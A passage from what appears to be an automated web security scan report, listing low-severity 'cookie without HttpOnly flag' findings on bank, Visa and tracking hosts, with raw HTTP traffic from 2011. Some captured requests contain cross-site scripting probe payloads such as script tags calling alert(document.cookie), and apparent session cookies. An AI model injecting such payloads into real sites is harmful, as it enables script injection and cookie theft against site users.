Location: /dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1296684059906&dcssip=www.citizensbank.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Citizens%20Bank:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Citizens%20Bank&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=2f09a5fcfe32cca7b8b1296687659993.1296684059993&WT.co_f=2f09a5fcfe32cca7b8b1296687659993&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAGAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNDqgAAOPTSU3j00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADj00lN2NNJTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


11.298. http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif?&dcsdat=1296684049096&dcssip=www.charterone.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Charter%20One:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Charter%20One&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=23b1ef31bcf943a33a31296687649101.1296684049101&WT.co_f=23b1ef31bcf943a33a31296687649101&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.charterone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAEAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVNBAAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Wed, 02 Feb 2011 21:59:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1296684049096&dcssip=www.charterone.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Charter%20One:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Charter%20One&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=23b1ef31bcf943a33a31296687649101.1296684049101&WT.co_f=23b1ef31bcf943a33a31296687649101&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAFAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADY00lN2NNJTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


11.299. http://stg.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stg.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: stg.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:37 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=ZA-00000000023314500; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:37 GMT
Location: http://stg.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


11.300. https://stg.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://stg.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: stg.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:37 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=ZA-00000000023314508; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:37 GMT
Location: https://stg.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


11.301. http://tc.bankofamerica.com/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.bankofamerica.com
Path:   /i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i?siteID=429&ts=1296684340039&location=http%3A%2F%2Fwww.bankofamerica.com%2Ffindit%2Ferror.cgi%3FBOA_0020%3D20110202%3A0%3AO%3A5067fc0c-5451-405a-bffc3c21dd627de9%26state%3Dfalse%26BA_0021%3Dfalse&tagv=4.3&tz=-360&r=http%3A%2F%2Fwww.bankofamerica.com%2Fvehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E45ae18a6011%2Findex.cfm&title=Bank%20of%20America%20%7C%20Please%20Try%20Again&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1
Host: tc.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Wed, 02 Feb 2011 22:04:41 GMT
Last-Modified: Wed, 02 Feb 2011 22:04:41 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Set-Cookie: TCID=0007ae71-9ad3-3b5c-9719-884700000028;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:04:41 GMT;
Connection: Keep-Alive
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:04:42 GMT;path=/;domain=bankofamerica.com

GIF89a.............!.......,............Q.;

11.302. https://tc.bankofamerica.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Wed, 02 Feb 2011 22:02:37 GMT
Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT;
Connection: Keep-Alive
Content-Length: 563
Content-Type: text/javascript; charset=ISO-8859-1
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com

callback({"ccid":
[
{"id": "BOA_HOME_SIGNON_HERO", "ds": [{"name": "Default1", "id": "13D1F2F5-B076-11DF-9D4F-00144F3EA4A4" , "coid" : "OGU5CH52"}]},{"id": "BOA_HOME_SIGNON_SERVICE_01", "ds": [{"na
...[SNIP]...

11.303. http://textchat.bankofamerica.com/hc/44850650/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://textchat.bankofamerica.com
Path:   /hc/44850650/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/44850650/?&site=44850650&cmd=mTagStartPage&lpCallId=87607160443-852770821656&protV=20&lpjson=1&page=http%3A//www.retirement.merrilledge.com/IRA/pages/home.aspx%3F%25009627c%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eac0806a009c%3D1&id=7538435277&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-MLDIra-english&activePlugin=none&cobrowse=true&PV%21unit=MLDIra&PV%21section=Home&PV%21ConversionStage=Home&PV%21Session%20ID=689c136b798e446897d1c2e0184bb0f5&PV%21pageLoadTime=35%20sec&PV%21visitorActive=1&SV%21language=english&title=The%20Big%20Picture%20on%20IRAs%20%7C%20Merrill%20Edge%20Retirement&referrer=http%3A//burp/show/16&cookie=SMIDENTITY%3DpD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX%2BxQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg%2BL0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa%2BZu0fT4K1i/%2B8UG4BntMDKs6xA/EgABaMXNP6xhj%2BXNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd%2B5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4%2BBNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI%2BSKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi%2Be1CLIx23wojYb%2BxRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd%3B%20pxs%3D689c136b798e446897d1c2e0184bb0f5%3B%20pxv%3D4B1B9E90-7DD2-4095-A535-9FE88031C408%3B%20CMAVID%3Dnone%3B%20cmTPSet%3DY HTTP/1.1
Host: textchat.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7079962972640756695; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; LivePersonID=LP i=7110426980824,d=1296685294; HumanClickACTIVE=1296685294535

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:21:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-7110426980824-1296685295:0; expires=Thu, 02-Feb-2012 22:21:35 GMT; path=/hc/44850650
Set-Cookie: HumanClickKEY=7079962972640756695; path=/hc/44850650
Set-Cookie: HumanClickSiteContainerID_44850650=STANDALONE; path=/hc/44850650
Set-Cookie: LivePersonID=-7110426980824-1296685295:-1:-1:-1:-1; expires=Thu, 02-Feb-2012 22:21:35 GMT; path=/hc/44850650
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 02 Feb 2011 22:21:35 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"87607160443-852770821656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

11.304. http://textchat.bankofamerica.com/hc/44850650/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://textchat.bankofamerica.com
Path:   /hc/44850650/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/44850650/?&site=44850650&cmd=mTagKnockPage&lpCallId=173159627477-900194228859&protV=20&lpjson=1&id=7538435277&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-MLDIra-english%7Cnull%7CLPButton%7C HTTP/1.1
Host: textchat.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:21:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=LP i=7110426980824,d=1296685294; expires=Thu, 02-Feb-2012 22:21:34 GMT; path=/
Set-Cookie: HumanClickKEY=7079962972640756695; path=/hc/44850650
Set-Cookie: HumanClickACTIVE=1296685294535; expires=Thu, 03-Feb-2011 22:21:34 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 02 Feb 2011 22:21:34 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28265

lpConnLib.Process({"ResultSet": {"lpCallId":"173159627477-900194228859","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'textchat.bankofame
...[SNIP]...

11.305. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:04 GMT
Expires: Thu, 03 Feb 2011 01:05:04 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=1bec15895da74ab0:TM=1296695104:LM=1296695104:S=GaVtpWsLtBVoNxSV; expires=Sat, 02-Feb-2013 01:05:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

11.306. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:02 GMT
Expires: Thu, 03 Feb 2011 01:05:02 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

11.307. http://usa.visa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?country=us&ep=v_gg_new&akamai=true HTTP/1.1
Host: usa.visa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 22:19:37 GMT
Accept-Ranges: bytes
ETag: "8062a7ca5db7cb1:0"
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 21:58:59 GMT
Connection: close
Set-Cookie: visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000; expires=Wed, 1-Jan-2020 23:59:59 GMT; path=/; domain=.visa.com
Set-Cookie: visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; path=/; domain=.visa.com
P3P:
Content-Length: 10831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...

11.308. http://vendorweb.citibank.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vendorweb.citibank.com
Path:   /HG

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HG?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 HTTP/1.1
Host: vendorweb.citibank.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 02 Feb 2011 21:59:59 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: CTG=1296683999; path=/; domain=vendorweb.citibank.com; expires=Wed, 09-Feb-2011 21:59:59 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Wed, 02 Feb 2011 22:00:00 GMT
Location: http://vendorweb.citibank.com/HGct?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115
Content-Type: image/gif
Content-Length: 0


11.309. http://vendorweb.citibank.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vendorweb.citibank.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 HTTP/1.1
Host: vendorweb.citibank.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
